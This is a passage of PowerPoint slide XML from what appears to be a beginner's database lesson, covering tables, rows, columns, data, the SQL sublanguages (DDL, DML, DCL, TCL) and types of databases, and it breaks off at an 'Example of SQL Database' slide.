              <a:t>permanently</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> store our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>information in system</a:t>
            </a:r>
            <a:endParaRPr sz="3500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Database contains many tables.</a:t>
            </a:r>
            <a:endParaRPr sz="3500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tables store your data</a:t>
            </a:r>
            <a:endParaRPr sz="3500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p: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3" name="Shape 2613"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2614" name="Google Shape;2614;p427"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1988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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TABLE</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2615" name="Google Shape;2615;p427"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="730600" y="1106300"/>
            <a:ext cx="8058000" cy="1083900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A table is structure that store information into rows and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>column</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Table contain data</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2616" name="Google Shape;2616;p427"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4825" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1971625" y="2524975"/>
            <a:ext cx="5706400" cy="2264025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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0" name="Shape 2620"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2621" name="Google Shape;2621;p428"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1988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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TABLE</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2622" name="Google Shape;2622;p428"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="612050" y="1151900"/>
            <a:ext cx="8101800" cy="2778000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rows are horizontal lines </a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vertical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> line</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2623" name="Google Shape;2623;p428"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7154400" y="2155675"/>
            <a:ext cx="1677900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="152400">
            <a:solidFill>
              <a:srgbClr val="E69138"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2624" name="Google Shape;2624;p428"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7154400" y="2845975"/>
            <a:ext cx="0" cy="1896900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="152400">
            <a:solidFill>
              <a:srgbClr val="42B983"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxn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429"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3812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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DATA</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2630" name="Google Shape;2630;p429"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493500" y="1406450"/>
            <a:ext cx="8226000" cy="3511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3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data is the information we want to save in tables</a:t>
            </a:r>
            <a:endParaRPr sz="3500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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4" name="Shape 2634"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2635" name="Google Shape;2635;p430"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="730600" y="302975"/>
            <a:ext cx="8089200" cy="4587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6" name="Google Shape;2636;p430"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1742875" y="1096375"/>
            <a:ext cx="6438600" cy="3448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7" name="Google Shape;2637;p430"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3516800" y="1534125"/>
            <a:ext cx="2708400" cy="2708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8" name="Google Shape;2638;p430"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5837600" y="439775"/>
            <a:ext cx="26355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DATABASE</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2639" name="Google Shape;2639;p430"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545975" y="1330900"/>
            <a:ext cx="26355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rPr>
              <a:t>TABLE/Collection</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2640" name="Google Shape;2640;p430"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3553250" y="2633025"/>
            <a:ext cx="26355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rPr>
              <a:t>DATA</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>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431"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="730600" y="302975"/>
            <a:ext cx="8089200" cy="4587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6" name="Google Shape;2646;p431"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1742875" y="1096375"/>
            <a:ext cx="6438600" cy="3448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7" name="Google Shape;2647;p431"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3516800" y="1534125"/>
            <a:ext cx="2708400" cy="2708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8" name="Google Shape;2648;p431"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4250775" y="439775"/>
            <a:ext cx="42222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DATABASE(OKALBS)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2649" name="Google Shape;2649;p431"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4599975" y="1194125"/>
            <a:ext cx="3511200" cy="51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lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TABLE (students)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2650" name="Google Shape;2650;p431"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3553250" y="2633025"/>
            <a:ext cx="26355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rPr>
              <a:t>DATA</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRP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sp>
        <p:nvSpPr>
          <p:cNvPr id="2655" name="Google Shape;2655;p432"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="730600" y="302975"/>
            <a:ext cx="8089200" cy="45873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6" name="Google Shape;2656;p432"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1742875" y="1096375"/>
            <a:ext cx="6438600" cy="34485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7" name="Google Shape;2657;p432"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3516800" y="1534125"/>
            <a:ext cx="2708400" cy="27084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8" name="Google Shape;2658;p432"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4250775" y="439775"/>
            <a:ext cx="42222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rPr>
              <a:t>DATABASE(dollorinfotech)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2659" name="Google Shape;2659;p432"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4599975" y="1194125"/>
            <a:ext cx="3511200" cy="51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lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TABLE (employees)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2660" name="Google Shape;2660;p432"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3553250" y="2633025"/>
            <a:ext cx="26355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rPr>
              <a:t>DATA</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>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4" name="Shape 2664"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2665" name="Google Shape;2665;p433"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="126775" y="376500"/>
            <a:ext cx="8890450" cy="4504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65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1173675" y="152400"/>
            <a:ext cx="7312967" cy="4991100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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9" name="Shape 2669"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2670" name="Google Shape;2670;p434"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="281725"/>
            <a:ext cx="8520600" cy="4599300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-450850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DDL - Data </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Definition</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Language</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-450850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DML - Data Manipulation Language</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-450850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DCL - Data Control Language</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-450850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TCL - Transaction Control Language</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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4" name="Shape 2674"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2675" name="Google Shape;2675;p435"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3812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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Types of Databases</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2676" name="Google Shape;2676;p435"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493500" y="1406450"/>
            <a:ext cx="8226000" cy="3511200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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Clr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL  Database (Relational DBs (RDBMS))</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NoSQL Database (Document Based DBs)</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In-Memory Database</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Time Series</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Database </a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>….. Many more</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRP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p436"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3812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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example of SQL Database</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2682" name="Google Shape;2682;p436"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="459000" y="1096375"/>
